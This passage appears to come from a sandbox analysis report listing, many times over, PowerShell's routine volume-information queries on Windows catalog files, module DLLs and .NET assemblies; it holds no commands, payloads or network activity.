                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
